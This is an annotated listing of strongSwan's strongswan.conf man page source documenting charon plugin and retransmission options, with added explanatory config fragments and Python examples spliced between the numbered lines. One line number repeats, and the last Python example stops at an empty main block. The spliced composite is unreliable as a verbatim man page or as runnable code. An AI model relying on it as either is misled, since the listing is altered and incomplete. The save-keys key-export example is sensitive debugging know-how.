                   1284: .BR charon.plugins.load-tester.ike_rekey " [0]"
                   1285: Seconds to start IKE_SA rekeying after setup.
                   1286: 
                   1287: .TP
                   1288: .BR charon.plugins.load-tester.init_limit " [0]"
                   1289: Global limit of concurrently established SAs during load test.
                   1290: 
                   1291: .TP
                   1292: .BR charon.plugins.load-tester.initiator " [0.0.0.0]"
                   1293: Address to initiate from.
                   1294: 
                   1295: .TP
                   1296: .BR charon.plugins.load-tester.initiator_auth " [pubkey]"
                   1297: Authentication method(s) the initiator uses.
                   1298: 
                   1299: .TP
                   1300: .BR charon.plugins.load-tester.initiator_id " []"
                   1301: Initiator ID used in load test.
                   1302: 
                   1303: .TP
                   1304: .BR charon.plugins.load-tester.initiator_match " []"
                   1305: Initiator ID to match against as responder.
                   1306: 
                   1307: .TP
                   1308: .BR charon.plugins.load-tester.initiator_tsi " []"
                   1309: Traffic selector on initiator side, as proposed by initiator.
                   1310: 
                   1311: .TP
                   1312: .BR charon.plugins.load-tester.initiator_tsr " []"
                   1313: Traffic selector on responder side, as proposed by initiator.
                   1314: 
                   1315: .TP
                   1316: .BR charon.plugins.load-tester.initiators " [0]"
                   1317: Number of concurrent initiator threads to use in load test.
                   1318: 
                   1319: .TP
                   1320: .BR charon.plugins.load-tester.issuer_cert " []"
                   1321: Path to the issuer certificate (if not configured a hard\-coded default value is
                   1322: used).
                   1323: 
                   1324: .TP
                   1325: .BR charon.plugins.load-tester.issuer_key " []"
                   1326: Path to private key that is used to issue certificates (if not configured a
                   1327: hard\-coded default value is used).
                   1328: 
                   1329: .TP
                   1330: .BR charon.plugins.load-tester.iterations " [1]"
                   1331: Number of IKE_SAs to initiate by each initiator in load test.
                   1332: 
                   1333: .TP
                   1334: .BR charon.plugins.load-tester.mode " [tunnel]"
                   1335: IPsec mode to use, one of
                   1336: .RI "" "tunnel" ","
                   1337: .RI "" "transport" ","
                   1338: or
                   1339: .RI "" "beet" "."
                   1340: 
                   1341: 
                   1342: .TP
                   1343: .BR charon.plugins.load-tester.pool " []"
                   1344: Provide INTERNAL_IPV4_ADDRs from a named pool.
                   1345: 
                   1346: .TP
                   1347: .BR charon.plugins.load-tester.preshared_key " [<default-psk>]"
                   1348: Preshared key to use in load test.
                   1349: 
                   1350: .TP
                   1351: .BR charon.plugins.load-tester.proposal " [aes128-sha1-modp768]"
                   1352: IKE proposal to use in load test.
                   1353: 
                   1354: .TP
                   1355: .BR charon.plugins.load-tester.request_virtual_ip " [no]"
1.1.1.2 ! misho    1356: Request an INTERNAL_IPV4_ADDR and INTERNAL_IPV6_ADDR from the server.
1.1       misho    1357: 
                   1358: .TP
                   1359: .BR charon.plugins.load-tester.responder " [127.0.0.1]"
                   1360: Address to initiate connections to.
                   1361: 
                   1362: .TP
                   1363: .BR charon.plugins.load-tester.responder_auth " [pubkey]"
                   1364: Authentication method(s) the responder uses.
                   1365: 
                   1366: .TP
                   1367: .BR charon.plugins.load-tester.responder_id " []"
                   1368: Responder ID used in load test.
                   1369: 
                   1370: .TP
                   1371: .BR charon.plugins.load-tester.responder_tsi " [initiator_tsi]"
                   1372: Traffic selector on initiator side, as narrowed by responder.
                   1373: 
                   1374: .TP
                   1375: .BR charon.plugins.load-tester.responder_tsr " [initiator_tsr]"
                   1376: Traffic selector on responder side, as narrowed by responder.
                   1377: 
                   1378: .TP
                   1379: .BR charon.plugins.load-tester.shutdown_when_complete " [no]"
                   1380: Shutdown the daemon after all IKE_SAs have been established.
                   1381: 
                   1382: .TP
                   1383: .BR charon.plugins.load-tester.socket " [unix://${piddir}/charon.ldt]"
                   1384: Socket provided by the load\-tester plugin.
                   1385: 
                   1386: .TP
                   1387: .BR charon.plugins.load-tester.version " [0]"
                   1388: IKE version to use (0 means use IKEv2 as initiator and accept any version as
                   1389: responder).
                   1390: 
                   1391: .TP
                   1392: .BR charon.plugins.lookip.socket " [unix://${piddir}/charon.lkp]"
                   1393: Socket provided by the lookip plugin.
                   1394: 
                   1395: .TP
                   1396: .BR charon.plugins.ntru.parameter_set " [optimum]"
                   1397: The following parameter sets are available:
                   1398: .RB "" "x9_98_speed" ","
                   1399: .RB "" "x9_98_bandwidth" ","
                   1400: .RB "" "x9_98_balance" ""
                   1401: and
                   1402: .RB "" "optimum" ","
                   1403: the last set not being
                   1404: part of the X9.98 standard but having the best performance.
                   1405: 
                   1406: .TP
                   1407: .BR charon.plugins.openssl.engine_id " [pkcs11]"
                   1408: ENGINE ID to use in the OpenSSL plugin.
                   1409: 
                   1410: .TP
                   1411: .BR charon.plugins.openssl.fips_mode " [0]"
                   1412: Set OpenSSL FIPS mode: disabled(0), enabled(1), Suite B enabled(2).
                   1413: 
                   1414: .TP
                   1415: .BR charon.plugins.osx-attr.append " [yes]"
                   1416: Whether DNS servers are appended to existing entries, instead of replacing them.
                   1417: 
                   1418: .TP
                   1419: .B charon.plugins.p-cscf.enable
                   1420: .br
                   1421: Section to enable requesting P\-CSCF server addresses for individual connections.
                   1422: 
                   1423: .TP
                   1424: .BR charon.plugins.p-cscf.enable.<conn> " [no]"
                   1425: <conn> is the name of a connection with an ePDG from which to request P\-CSCF
                   1426: server addresses.  Requests will be sent for addresses of the same families for
                   1427: which internal IPs are requested.
                   1428: 
                   1429: .TP
                   1430: .B charon.plugins.pkcs11.modules
                   1431: .br
                   1432: List of available PKCS#11 modules.
                   1433: 
                   1434: .TP
                   1435: .BR charon.plugins.pkcs11.modules.<name>.load_certs " [yes]"
                   1436: Whether to automatically load certificates from tokens.
                   1437: 
                   1438: .TP
                   1439: .BR charon.plugins.pkcs11.modules.<name>.os_locking " [no]"
                   1440: Whether OS locking should be enabled for this module.
                   1441: 
                   1442: .TP
                   1443: .BR charon.plugins.pkcs11.modules.<name>.path " []"
                   1444: Full path to the shared object file of this PKCS#11 module.
                   1445: 
                   1446: .TP
                   1447: .BR charon.plugins.pkcs11.reload_certs " [no]"
                   1448: Reload certificates from all tokens if charon receives a SIGHUP.
                   1449: 
                   1450: .TP
                   1451: .BR charon.plugins.pkcs11.use_dh " [no]"
                   1452: Whether the PKCS#11 modules should be used for DH and ECDH (see
                   1453: .RI "" "use_ecc" ""
                   1454: option).
                   1455: 
                   1456: .TP
                   1457: .BR charon.plugins.pkcs11.use_ecc " [no]"
                   1458: Whether the PKCS#11 modules should be used for ECDH and ECDSA public key
                   1459: operations. ECDSA private keys can be used regardless of this option.
                   1460: 
                   1461: .TP
                   1462: .BR charon.plugins.pkcs11.use_hasher " [no]"
                   1463: Whether the PKCS#11 modules should be used to hash data.
                   1464: 
                   1465: .TP
                   1466: .BR charon.plugins.pkcs11.use_pubkey " [no]"
                   1467: Whether the PKCS#11 modules should be used for public key operations, even for
                   1468: keys not stored on tokens.
                   1469: 
                   1470: .TP
                   1471: .BR charon.plugins.pkcs11.use_rng " [no]"
                   1472: Whether the PKCS#11 modules should be used as RNG.
                   1473: 
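To show how the <name> placeholder in the module options above is filled in, here is an added example of a pkcs11 section, not taken from this page or from strongSwan's documentation. The module name softhsm and the library path are assumptions; substitute the PKCS#11 library you actually deploy.

```conf
# Added example, not from strongswan.conf(5). "softhsm" and the path are
# assumptions; "softhsm" is just the section name charon uses for this module.
charon {
    plugins {
        pkcs11 {
            # re-read certificates from all tokens on SIGHUP
            reload_certs = yes
            # keep DH/ECDH, hashing, RNG and off-token public key
            # operations in software; only private keys live on the token
            use_dh = no
            use_ecc = no
            use_hasher = no
            use_pubkey = no
            use_rng = no
            modules {
                softhsm {
                    path = /usr/lib/softhsm/libsofthsm2.so
                    # load certificates stored on the token automatically
                    load_certs = yes
                    # let the module use native OS locking (CKF_OS_LOCKING_OK)
                    os_locking = yes
                }
            }
        }
    }
}
```

Leaving the use_* options at their default of no keeps the module on the narrow path it was chosen for, private key operations, and avoids routing every hash, DH exchange and random byte through a library that is usually slower and, for a smartcard, single-threaded.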
                   1474: .TP
                   1475: .BR charon.plugins.radattr.dir " []"
                   1476: Directory where RADIUS attributes are stored in client\-ID specific files.
                   1477: 
                   1478: .TP
                   1479: .BR charon.plugins.radattr.message_id " [-1]"
                   1480: Attributes are added to all IKE_AUTH messages by default (\-1), or only to the
                   1481: IKE_AUTH message with the given IKEv2 message ID.
                   1482: 
                   1483: .TP
                   1484: .BR charon.plugins.random.random " [${random_device}]"
                   1485: File to read random bytes from.
                   1486: 
                   1487: .TP
                   1488: .BR charon.plugins.random.strong_equals_true " [no]"
                   1489: If set to yes, the RNG_STRONG class reads random bytes from the same source as
                   1490: the RNG_TRUE class.
                   1491: 
                   1492: .TP
                   1493: .BR charon.plugins.random.urandom " [${urandom_device}]"
                   1494: File to read pseudo random bytes from.
                   1495: 
                   1496: .TP
                   1497: .BR charon.plugins.resolve.file " [/etc/resolv.conf]"
                   1498: File where to add DNS server entries.
                   1499: 
                   1500: .TP
                   1501: .BR charon.plugins.resolve.resolvconf.iface_prefix " [lo.inet.ipsec.]"
                   1502: Prefix used for interface names sent to
                   1503: .RB "" "resolvconf" "(8)."
                   1504: The nameserver
                   1505: address is appended to this prefix to make it unique.  The result has to be a
                   1506: valid interface name according to the rules defined by resolvconf.  Also, it
                   1507: should have a high priority according to the order defined in
                   1508: .RB "" "interface\-order" "(5)."
                   1509: 
                   1510: 
                   1511: .TP
                   1512: .BR charon.plugins.revocation.enable_crl " [yes]"
                   1513: Whether CRL validation should be enabled.
                   1514: 
                   1515: .TP
                   1516: .BR charon.plugins.revocation.enable_ocsp " [yes]"
                   1517: Whether OCSP validation should be enabled.
                   1518: 
                   1519: .TP
                   1520: .BR charon.plugins.save-keys.esp " [no]"
                   1521: Whether to save ESP keys.
                   1522: 
                   1523: .TP
                   1524: .BR charon.plugins.save-keys.ike " [no]"
                   1525: Whether to save IKE keys.
                   1526: 
                   1527: .TP
                   1528: .BR charon.plugins.save-keys.load " [no]"
                   1529: Whether to load the plugin.
                   1530: 
                   1531: .TP
                   1532: .BR charon.plugins.save-keys.wireshark_keys " []"
                   1533: Directory where the keys are stored in the format supported by Wireshark. IKEv1
                   1534: keys are stored in the
                   1535: .RI "" "ikev1_decryption_table" ""
                   1536: file. IKEv2 keys are stored in
                   1537: the
                   1538: .RI "" "ikev2_decryption_table" ""
                   1539: file. Keys for ESP CHILD_SAs are stored in the
                   1540: .RI "" "esp_sa" ""
                   1541: file.
                   1542: 
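The following fragment is an added example of a save-keys configuration for a lab capture; it is not from this page or from strongSwan's documentation, and the directory path is an assumption.

```conf
# Added example, not from strongswan.conf(5). Path is an assumption.
# Only for lab use: anyone who can read the directory can decrypt every
# IKE and ESP packet captured while these SAs were alive.
charon {
    plugins {
        save-keys {
            load = yes
            ike = yes
            esp = yes
            wireshark_keys = /root/strongswan-keys
        }
    }
}
```

Create the directory with mode 0700 before starting charon, and keep the plugin unloaded (the default) on any production gateway; the plugin only has an effect while load = yes, so it is enough to drop that line to disable it. In Wireshark, point the ISAKMP protocol preferences at the ikev2_decryption_table (or ikev1_decryption_table) file and the ESP preferences at the esp_sa file from that directory.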
                   1543: .TP
                   1544: .BR charon.plugins.socket-default.fwmark " []"
                   1545: Firewall mark to set on outbound packets.
                   1546: 
                   1547: .TP
                   1548: .BR charon.plugins.socket-default.set_source " [yes]"
                   1549: Set source address on outbound packets, if possible.
                   1550: 
                   1551: .TP
                   1552: .BR charon.plugins.socket-default.set_sourceif " [no]"
                   1553: Force sending interface on outbound packets, if possible. This allows using IPv6
                   1554: link\-local addresses as tunnel endpoints.
                   1555: 
                   1556: .TP
                   1557: .BR charon.plugins.socket-default.use_ipv4 " [yes]"
                   1558: Listen on IPv4, if possible.
                   1559: 
                   1560: .TP
                   1561: .BR charon.plugins.socket-default.use_ipv6 " [yes]"
                   1562: Listen on IPv6, if possible.
                   1563: 
                   1564: .TP
                   1565: .BR charon.plugins.sql.database " []"
                   1566: Database URI for charon's SQL plugin. If it contains a password, make sure to
                   1567: adjust the permissions of the config file accordingly.
                   1568: 
                   1569: .TP
                   1570: .BR charon.plugins.sql.loglevel " [-1]"
                   1571: Loglevel for logging to SQL database.
                   1572: 
                   1573: .TP
                   1574: .BR charon.plugins.stroke.allow_swap " [yes]"
                   1575: Analyze addresses/hostnames in
                   1576: .RI "" "left|right" ""
                   1577: to detect which side is local and
                   1578: swap configuration options if necessary. If disabled
                   1579: .RI "" "left" ""
                   1580: is always
                   1581: .RI "" "local" "."
                   1582: 
                   1583: 
                   1584: .TP
                   1585: .BR charon.plugins.stroke.ignore_missing_ca_basic_constraint " [no]"
                   1586: Treat certificates in ipsec.d/cacerts and ipsec.conf ca sections as CA
                   1587: certificates even if they don't contain a CA basic constraint.
                   1588: 
                   1589: .TP
                   1590: .BR charon.plugins.stroke.max_concurrent " [4]"
                   1591: Maximum number of stroke messages handled concurrently.
                   1592: 
                   1593: .TP
                   1594: .BR charon.plugins.stroke.prevent_loglevel_changes " [no]"
                   1595: If enabled, log level changes via the stroke socket are not allowed.
                   1596: 
                   1597: .TP
                   1598: .BR charon.plugins.stroke.secrets_file " [${sysconfdir}/ipsec.secrets]"
                   1599: Location of the ipsec.secrets file.
                   1600: 
                   1601: .TP
                   1602: .BR charon.plugins.stroke.socket " [unix://${piddir}/charon.ctl]"
                   1603: Socket provided by the stroke plugin.
                   1604: 
                   1605: .TP
                   1606: .BR charon.plugins.stroke.timeout " [0]"
                   1607: Timeout in ms for any stroke command. Use 0 to disable the timeout.
                   1608: 
                   1609: .TP
                   1610: .BR charon.plugins.systime-fix.interval " [0]"
                   1611: Interval in seconds to check system time for validity. 0 disables the check.
                   1612: 
                   1613: .TP
                   1614: .BR charon.plugins.systime-fix.reauth " [no]"
                   1615: Whether to reauthenticate (yes) or delete (no) an IKE_SA if an invalid
                   1616: certificate lifetime is detected.
                   1616: 
                   1617: .TP
                   1618: .BR charon.plugins.systime-fix.threshold " []"
                   1619: Threshold date where system time is considered valid. Disabled if not specified.
                   1620: 
                   1621: .TP
                   1622: .BR charon.plugins.systime-fix.threshold_format " [%Y]"
                   1623: .RB "" "strptime" "(3)"
                   1624: format used to parse threshold option.
                   1625: 
                   1626: .TP
                   1627: .BR charon.plugins.systime-fix.timeout " [0s]"
                   1628: How long to wait for a valid system time if an interval is configured. 0 to
                   1629: recheck indefinitely.
                   1630: 
                   1631: .TP
                   1632: .BR charon.plugins.tnc-ifmap.client_cert " []"
                   1633: Path to X.509 certificate file of IF\-MAP client.
                   1634: 
                   1635: .TP
                   1636: .BR charon.plugins.tnc-ifmap.client_key " []"
                   1637: Path to private key file of IF\-MAP client.
                   1638: 
                   1639: .TP
                   1640: .BR charon.plugins.tnc-ifmap.device_name " []"
                   1641: Unique name of strongSwan server as a PEP and/or PDP device.
                   1642: 
                   1643: .TP
                   1644: .BR charon.plugins.tnc-ifmap.renew_session_interval " [150]"
                   1645: Interval in seconds between periodic IF\-MAP RenewSession requests.
                   1646: 
                   1647: .TP
                   1648: .BR charon.plugins.tnc-ifmap.server_cert " []"
                   1649: Path to X.509 certificate file of IF\-MAP server.
                   1650: 
                   1651: .TP
                   1652: .BR charon.plugins.tnc-ifmap.server_uri " [https://localhost:8444/imap]"
                   1653: URI of the form [https://]servername[:port][/path].
                   1654: 
                   1655: .TP
                   1656: .BR charon.plugins.tnc-ifmap.username_password " []"
                   1657: Credentials of IF\-MAP client of the form username:password. If set, make sure to
                   1658: adjust the permissions of the config file accordingly.
                   1659: 
                   1660: .TP
                   1661: .BR charon.plugins.tnc-imc.dlclose " [yes]"
                   1662: Unload IMC after use.
                   1663: 
                   1664: .TP
                   1665: .BR charon.plugins.tnc-imc.preferred_language " [en]"
                   1666: Preferred language for TNC recommendations.
                   1667: 
                   1668: .TP
                   1669: .BR charon.plugins.tnc-imv.dlclose " [yes]"
                   1670: Unload IMV after use.
                   1671: 
                   1672: .TP
                   1673: .BR charon.plugins.tnc-imv.recommendation_policy " [default]"
                   1674: TNC recommendation policy, one of
                   1675: .RI "" "default" ","
                   1676: .RI "" "any" ","
                   1677: or
                   1678: .RI "" "all" "."
                   1679: 
                   1680: 
                   1681: .TP
                   1682: .BR charon.plugins.tnc-pdp.pt_tls.enable " [yes]"
                   1683: Enable PT\-TLS protocol on the strongSwan PDP.
                   1684: 
                   1685: .TP
                   1686: .BR charon.plugins.tnc-pdp.pt_tls.port " [271]"
                   1687: PT\-TLS server port the strongSwan PDP is listening on.
                   1688: 
                   1689: .TP
                   1690: .BR charon.plugins.tnc-pdp.radius.enable " [yes]"
                   1691: Enable RADIUS protocol on the strongSwan PDP.
                   1692: 
                   1693: .TP
                   1694: .BR charon.plugins.tnc-pdp.radius.method " [ttls]"
                   1695: EAP tunnel method to be used.
                   1696: 
                   1697: .TP
                   1698: .BR charon.plugins.tnc-pdp.radius.port " [1812]"
                   1699: RADIUS server port the strongSwan PDP is listening on.
                   1700: 
                   1701: .TP
                   1702: .BR charon.plugins.tnc-pdp.radius.secret " []"
                   1703: Shared RADIUS secret between strongSwan PDP and NAS. If set, make sure to adjust
                   1704: the permissions of the config file accordingly.
                   1705: 
                   1706: .TP
                   1707: .BR charon.plugins.tnc-pdp.server " []"
                   1708: Name of the strongSwan PDP as contained in the AAA certificate.
                   1709: 
                   1710: .TP
                   1711: .BR charon.plugins.tnc-pdp.timeout " []"
                   1712: Timeout in seconds before closing incomplete connections.
                   1713: 
                   1714: .TP
                   1715: .BR charon.plugins.tnccs-11.max_message_size " [45000]"
                   1716: Maximum size of a PA\-TNC message (XML & Base64 encoding).
                   1717: 
                   1718: .TP
                   1719: .BR charon.plugins.tnccs-20.max_batch_size " [65522]"
                   1720: Maximum size of a PB\-TNC batch (upper limit via PT\-EAP = 65529).
                   1721: 
                   1722: .TP
                   1723: .BR charon.plugins.tnccs-20.max_message_size " [65490]"
                   1724: Maximum size of a PA\-TNC message (upper limit via PT\-EAP = 65497).
                   1725: 
                   1726: .TP
                   1727: .BR charon.plugins.tnccs-20.mutual " [no]"
                   1728: Enable PB\-TNC mutual protocol.
                   1729: 
                   1730: .TP
                   1731: .BR charon.plugins.tnccs-20.tests.pb_tnc_noskip " [no]"
                   1732: Send an unsupported PB\-TNC message type with the NOSKIP flag set.
                   1733: 
                   1734: .TP
                   1735: .BR charon.plugins.tnccs-20.tests.pb_tnc_version " [2]"
                   1736: Send a PB\-TNC batch with a modified PB\-TNC version.
                   1737: 
                   1738: .TP
                   1739: .BR charon.plugins.tpm.fips_186_4 " [no]"
                   1740: Whether the TPM 2.0 is FIPS\-186\-4 compliant, which forces e.g. the use of the
                   1741: default salt length instead of the maximum salt length with RSA\-PSS padding.
                   1742: 
                   1743: .TP
                   1744: .BR charon.plugins.tpm.tcti.name " [device|tabrmd]"
                   1745: Name of TPM 2.0 TCTI library. Valid values:
                   1746: .RI "" "tabrmd" ","
                   1747: .RI "" "device" ""
                   1748: or
                   1749: .RI "" "mssim" "."
                   1750: Defaults are
                   1751: .RI "" "device" ""
                   1752: if the
                   1753: .RI "" "/dev/tpmrm0" ""
                   1754: in\-kernel TPM 2.0 resource manager
                   1755: device exists, and
                   1756: .RI "" "tabrmd" ""
                   1757: otherwise, requiring the d\-bus based TPM 2.0 access
                   1758: broker and resource manager to be available.
                   1759: 
                   1760: .TP
                   1761: .BR charon.plugins.tpm.tcti.opts " [/dev/tpmrm0|<none>]"
                   1762: Options for the TPM 2.0 TCTI library. Defaults are
                   1763: .RI "" "/dev/tpmrm0" ""
                   1764: if the TCTI
                   1765: library name is
                   1766: .RI "" "device" ""
                   1767: and no options otherwise.
                   1768: 
                   1769: .TP
                   1770: .BR charon.plugins.tpm.use_rng " [no]"
                   1771: Whether the TPM should be used as RNG.
                   1772: 
                   1773: .TP
                   1774: .BR charon.plugins.unbound.dlv_anchors " []"
                   1775: File to read trusted keys for DLV (DNSSEC Lookaside Validation) from. It uses
                   1776: the same format as
                   1777: .RI "" "trust_anchors" "."
                   1778: Only one DLV can be configured, which is
                   1779: then used as a root trusted DLV; this means that it is a lookaside for the root.
                   1780: 
                   1781: .TP
                   1782: .BR charon.plugins.unbound.resolv_conf " [/etc/resolv.conf]"
                   1783: File to read DNS resolver configuration from.
                   1784: 
                   1785: .TP
                   1786: .BR charon.plugins.unbound.trust_anchors " [/etc/ipsec.d/dnssec.keys]"
                   1787: File to read DNSSEC trust anchors from (usually root zone KSK). The format of
                   1788: the file is the standard DNS Zone file format, anchors can be stored as DS or
                   1789: DNSKEY entries in the file.
                   1790: 
                   1791: .TP
                   1792: .BR charon.plugins.updown.dns_handler " [no]"
                   1793: Whether the updown script should handle DNS servers assigned via IKEv1 Mode
                   1794: Config or IKEv2 Config Payloads (if enabled they can't be handled by other
                   1795: plugins, like resolve).
                   1796: 
                   1797: .TP
                   1798: .BR charon.plugins.vici.socket " [unix://${piddir}/charon.vici]"
                   1799: Socket the vici plugin serves clients.
                   1800: 
                   1801: .TP
                   1802: .BR charon.plugins.whitelist.enable " [yes]"
                   1803: Enable loaded whitelist plugin.
                   1804: 
                   1805: .TP
                   1806: .BR charon.plugins.whitelist.socket " [unix://${piddir}/charon.wlst]"
                   1807: Socket provided by the whitelist plugin.
                   1808: 
                   1809: .TP
                   1810: .BR charon.plugins.wolfssl.fips_mode " [no]"
                   1811: Enable to prevent loading the plugin if wolfSSL is not in FIPS mode.
                   1812: 
                   1813: .TP
                   1814: .BR charon.plugins.xauth-eap.backend " [radius]"
                   1815: EAP plugin to be used as backend for XAuth credential verification.
                   1816: 
                   1817: .TP
                   1818: .BR charon.plugins.xauth-pam.pam_service " [login]"
                   1819: PAM service to be used for authentication.
                   1820: 
                   1821: .TP
                   1822: .BR charon.plugins.xauth-pam.session " [no]"
                   1823: Open/close a PAM session for each active IKE_SA.
                   1824: 
                   1825: .TP
                   1826: .BR charon.plugins.xauth-pam.trim_email " [yes]"
                   1827: If an email address is received as an XAuth username, trim it to just the
                   1828: username part.
                   1829: 
                   1830: .TP
                   1831: .BR charon.port " [500]"
                   1832: UDP port used locally. If set to 0, a random port will be allocated.
                   1833: 
                   1834: .TP
                   1835: .BR charon.port_nat_t " [4500]"
                   1836: UDP port used locally in case of NAT\-T. If set to 0, a random port will be
                   1837: allocated.  Has to be different from
                   1838: .RB "" "charon.port" ","
                   1839: otherwise a random port
                   1840: will be allocated.
                   1841: 
                   1842: .TP
                   1843: .BR charon.prefer_best_path " [no]"
                   1844: By default, charon keeps SAs on the routing path with addresses it previously
                   1845: used if that path is still usable. By setting this option to yes, it tries more
                   1846: aggressively to update SAs with MOBIKE on routing priority changes using the
                   1847: cheapest path. This adds more noise, but allows SAs to be adapted dynamically to
                   1848: routing priority changes. This option has no effect if MOBIKE is not supported
                   1849: or disabled.
                   1850: 
                   1851: .TP
                   1852: .BR charon.prefer_configured_proposals " [yes]"
                   1853: Prefer locally configured proposals for IKE/IPsec over supplied ones as
                   1854: responder (disabling this can avoid keying retries due to INVALID_KE_PAYLOAD
                   1855: notifies).
                   1856: 
                   1857: .TP
                   1858: .BR charon.prefer_temporary_addrs " [no]"
                   1859: By default, permanent IPv6 source addresses are preferred over temporary ones
                   1860: (RFC 4941), to make connections more stable. Enable this option to reverse this.
                   1861: 
                   1862: It also affects which IPv6 addresses are announced as additional addresses if
                   1863: MOBIKE is used.  If the option is disabled, only permanent addresses are sent,
                   1864: and only temporary ones if it is enabled.
                   1865: 
                   1866: .TP
                   1867: .BR charon.process_route " [yes]"
                   1868: Process RTM_NEWROUTE and RTM_DELROUTE events.
                   1869: 
                   1870: .TP
                   1871: .B charon.processor.priority_threads
                   1872: .br
                   1873: Section to configure the number of reserved threads per priority class, see JOB
                   1874: PRIORITY MANAGEMENT in
                   1875: .RB "" "strongswan.conf" "(5)."
                   1876: 
                   1877: 
                   1878: .TP
                   1879: .BR charon.rdn_matching " [strict]"
                   1880: How RDNs in subject DNs of certificates are matched against configured
                   1881: identities. Possible values are
                   1882: .RI "" "strict" ""
                   1883: (the default),
                   1884: .RI "" "reordered" ","
                   1885: and
                   1886: .RI "" "relaxed" "."
                   1887: With
                   1888: .RI "" "strict" ""
                   1889: the number, type and order of all RDNs has to match,
                   1890: wildcards (*) for the values of RDNs are allowed (that's the case for all three
                   1891: variants). Using
                   1892: .RI "" "reordered" ""
                   1893: also matches DNs if the RDNs appear in a different
                   1894: order; the number and type still have to match. Finally,
                   1895: .RI "" "relaxed" ""
                   1896: also allows
                   1897: matches of DNs that contain more RDNs than the configured identity (missing RDNs
                   1898: are treated like a wildcard match).
                   1899: 
                   1900: Note that
                   1901: .RI "" "reordered" ""
                   1902: and
                   1903: .RI "" "relaxed" ""
                   1904: impose a considerable overhead on memory
                   1905: usage and runtime, in particular, for mismatches, compared to
                   1906: .RI "" "strict" "."
                   1907: 
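The three rdn_matching modes described above, as an added Python example that is not strongSwan's own code: the DN parser is a simplified one for the constructed identities used here (no escaped commas, no multi-valued RDNs), and attribute values are compared case-sensitively; both are assumptions of this example, not statements about charon's X.509 handling.

```python
def parse_dn(dn):
    """Split "C=CH, O=strongSwan, CN=*" into [("C", "CH"), ("O", "strongSwan"), ("CN", "*")].

    Simplified parser (assumption of this example): no escaped commas and no
    multi-valued RDNs, which is enough for the constructed identities below.
    """
    rdns = []
    for part in dn.split(","):
        part = part.strip()
        if not part:
            continue
        rdn_type, _, value = part.partition("=")
        rdns.append((rdn_type.strip().upper(), value.strip()))
    return rdns


def _value_matches(pattern, value):
    # A "*" in the configured identity matches any value; this is allowed in
    # all three modes, so it is shared by strict, reordered and relaxed.
    return pattern == "*" or pattern == value


def _match_unordered(identity, subject, allow_extra):
    """Pair every configured RDN with a distinct subject RDN of the same type.

    Exact values are matched before wildcards so that a wildcard RDN only
    consumes subject RDNs no exact RDN needs.  The nested search is the reason
    reordered/relaxed cost more than strict, especially on mismatches.
    """
    if not allow_extra and len(identity) != len(subject):
        return False
    unused = list(subject)
    ordered = sorted(identity, key=lambda rdn: rdn[1] == "*")  # exact first
    for rdn_type, pattern in ordered:
        for i, (s_type, s_value) in enumerate(unused):
            if s_type == rdn_type and _value_matches(pattern, s_value):
                del unused[i]
                break
        else:
            return False  # a configured RDN found no counterpart
    return True


def dn_matches(identity_dn, subject_dn, mode="strict"):
    """Match a certificate subject DN against a configured identity DN.

    strict:    same number, type and order of RDNs (wildcard values allowed)
    reordered: same number and type, any order
    relaxed:   any order, and the subject may carry additional RDNs
    """
    identity = parse_dn(identity_dn)
    subject = parse_dn(subject_dn)
    if mode == "strict":
        return len(identity) == len(subject) and all(
            i_type == s_type and _value_matches(pattern, s_value)
            for (i_type, pattern), (s_type, s_value) in zip(identity, subject)
        )
    if mode == "reordered":
        return _match_unordered(identity, subject, allow_extra=False)
    if mode == "relaxed":
        return _match_unordered(identity, subject, allow_extra=True)
    raise ValueError("unknown rdn_matching mode: %s" % mode)


if __name__ == "__main__":
    # Constructed identity and subjects, not taken from any real deployment.
    identity = "C=CH, O=strongSwan, CN=*"
    for subject in ("C=CH, O=strongSwan, CN=gw.example.org",
                    "O=strongSwan, C=CH, CN=gw.example.org",
                    "C=CH, O=strongSwan, OU=VPN, CN=gw.example.org"):
        print(subject, [dn_matches(identity, subject, m)
                        for m in ("strict", "reordered", "relaxed")])
```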
                   1908: 
                   1909: .TP
                   1910: .BR charon.receive_delay " [0]"
                   1911: Delay in ms for receiving packets, to simulate larger RTT.
                   1912: 
                   1913: .TP
                   1914: .BR charon.receive_delay_request " [yes]"
                   1915: Delay request messages.
                   1916: 
                   1917: .TP
                   1918: .BR charon.receive_delay_response " [yes]"
                   1919: Delay response messages.
                   1920: 
                   1921: .TP
                   1922: .BR charon.receive_delay_type " [0]"
                   1923: Specific IKEv2 message type to delay, 0 for any.
                   1924: 
                   1925: .TP
                   1926: .BR charon.replay_window " [32]"
                   1927: Size of the AH/ESP replay window, in packets.
                   1928: 
                   1929: .TP
                   1930: .BR charon.retransmit_base " [1.8]"
                   1931: Base to use for calculating exponential back off, see IKEv2 RETRANSMISSION in
                   1932: .RB "" "strongswan.conf" "(5)."
                   1933: 
                   1934: 
                   1935: .TP
                   1936: .BR charon.retransmit_jitter " [0]"
                   1937: Maximum jitter in percent to apply randomly to calculated retransmission timeout
                   1938: (0 to disable).
                   1939: 
                   1940: .TP
                   1941: .BR charon.retransmit_limit " [0]"
                   1942: Upper limit in seconds for calculated retransmission timeout (0 to disable).
                   1943: 
                   1944: .TP
                   1945: .BR charon.retransmit_timeout " [4.0]"
                   1946: Timeout in seconds before sending first retransmit.
                   1947: 
                   1948: .TP
                   1949: .BR charon.retransmit_tries " [5]"
                   1950: Number of times to retransmit a packet before giving up.
                   1951: 
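The retransmission schedule that charon.retransmit_timeout, retransmit_base, retransmit_tries, retransmit_limit and retransmit_jitter define, as an added Python example that is not strongSwan's own code. It assumes the wait before the n-th retransmit is timeout * base^n (n starting at 0), that the limit is applied before the jitter is subtracted, and that one final wait follows the last retransmit before the exchange is declared failed.

```python
import random


def retransmit_schedule(timeout=4.0, base=1.8, tries=5, limit=0, jitter=0, rng=None):
    """Wait times in seconds before each retransmit and before the final give-up.

    Defaults are the page's defaults: retransmit_timeout=4.0,
    retransmit_base=1.8, retransmit_tries=5, retransmit_limit=0 (disabled)
    and retransmit_jitter=0 (disabled).  The result has tries + 1 entries:
    one wait before each of the `tries` retransmits, plus the wait after the
    last retransmit before the exchange is considered failed (assumption of
    this example, see lead-in).
    """
    if rng is None:
        rng = random.Random(0)  # seeded so jittered runs are reproducible
    waits = []
    for n in range(tries + 1):
        t = timeout * base ** n  # exponential back-off
        if limit:
            t = min(t, float(limit))  # cap; assumed to apply before jitter
        if jitter:
            # subtract a random share of up to `jitter` percent of the timeout
            t -= (t / 100.0) * jitter * rng.random()
        waits.append(round(t, 3))
    return waits


def time_to_failure(**kwargs):
    """Seconds from the first transmission until the exchange is given up."""
    return round(sum(retransmit_schedule(**kwargs)), 3)


if __name__ == "__main__":
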